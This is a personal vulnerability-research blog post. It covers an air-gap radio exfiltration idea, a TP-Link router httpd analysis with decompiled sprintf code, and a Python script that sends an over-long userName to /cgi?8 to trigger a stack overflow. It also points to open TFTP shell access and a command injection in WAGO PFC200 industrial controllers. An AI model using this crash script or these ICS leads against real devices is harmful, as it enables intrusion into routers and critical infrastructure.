Mi0r4sora

fun life is better than every money vulnerability research just for fun

If someone asks me what I think about air-gapped networks, I will answer that they are a very good way to increase network security. But if they say that such a network cannot be hacked at all, I will show them this sample and the articles, along with the source code.

An example structure for getting an AM 1580 kHz signal from the CPU bus to the destination: with that structure, the CPU's timing pulses are used to send data across the air-gapped network.

Hmm, we can do this with a function like the hostgetclock_service.

One day when I was really bored, I told my friends to send me the models and types of the routers and IoT devices they have, so that I could send them an example of their vulnerabilities. In the meantime, they said the name of this device is TP-Link.

In the first part, I went to /etc to check the entries, so that I could learn from them the type of input data the interfaces take and things like that. The parts that are really interesting for developing the exploit are ppp and pppoe, and also l2tp and so on. For this part I went to httpd, which is a custom web server, to start with.


In the image above, I saw io, which is the input and output controller, and which is referenced by the several functions that you see.


The function looks up the different paths and returns 404 if none of them matches.


The interesting route:

The input is parsed from the http header side on the


Vulnerable function: httprpmauth_main

Vulnerability (decompiler output as shown on the page):

```c
if (param1[0xd] == 1) {
    pcVar3 = "adminName=%s\nadminPwd=%s\n";
} else {
    pcVar3 = "userName=%s\nuserPwd=%s\n";
}
sprintf(acStack1fbc, pcVar3);
iVar1 = rdpsetObj(0, "USERCFG", &local1fec, acStack1fbc, 2);
```

This one is related to what I showed: it gets the HTTP header request parameters and copies them onto the stack with sprintf. After that I need to know which route feeds input into it, so I guess the cross-references to this function will lead me to the route.

```c
httpaliasaddEntryByArg(2, "/cgi/auth", (char *)0x0, (int)httprpmauthmain, ghttpauthordefault);
```

param1 is an int; I have no idea what it does, so I need to analyse the function. param2 is the route, param3 is 0x0, param4 is the function that is called to get the parameters of the header request, and param_5 may be a default parameter set by the device.

So on this route, can we use these HTTP header parameters to get an overflow?

```python
import requests

headers = {
    "Host": "192.168.0.1",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "text/plain",
    # Content-Length is computed by requests from the body; a fixed value
    # copied from a browser capture would not match the 2048-byte payload.
    "Origin": "http://192.168.0.1",
    "Connection": "close",
    "Referer": "http://192.168.0.1/",
}

# Maybe this: an over-long userName to test whether the stack buffer overflows
payload = "a" * 2048
formdata = "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,userName={}\nuserPwd=1231313".format(payload)
url = "http://192.168.0.1/cgi?8"
response = requests.post(url, data=formdata, headers=headers)
print(response.text)
```

If it doesn't work, change the parameters to the true ones and test it to get a crash, so we can exploit it like that.

I guess some day I want to research some PLC devices, and I see this device on Shodan. Hmm... I don't know anything about it, so I download the software and firmware from the site and start researching.

And what I see is that the TFTP port on it is open by default. Why? So I check this on some critical devices and I see this too. Bruh, we can get root access on these.

And we can access the device. After I saw that, I thought to myself: do I have a zero day? But today I see this vulnerability has been patched as CVE-2019-9201.

This vulnerability is basically the shell access port being open without any credentials :/

Today I explain how we can exploit the command injection vulnerability in the WAGO PFC200 firmware.

Command injection is a vulnerability that allows an attacker to execute their own commands on the device and gain access to it.

The vulnerability is in this directory: pfc200/var/www/wbm/php

and the filename is: session_lifetime.inc.php

This function, which is called on each sent request, is responsible for checking the username parameter in the session ID (PHPSESS).

We can't inject the command into the session directly; we just need to check where this function is used on the web server and inject our own command there, for fun :)


In order to give them a little more time, I will not publish this yet (I'm talking about the PoC and other stuff like that).

So this is a really shitty command injection in this function :/

Why do you use this?

I have reported it, but there is still no response after 1 week. I also have 2 other vulnerabilities in the iocheckd service, but I don't feel like reporting them.

This is a WAN-side vulnerability, and this device is used in really critical infrastructure.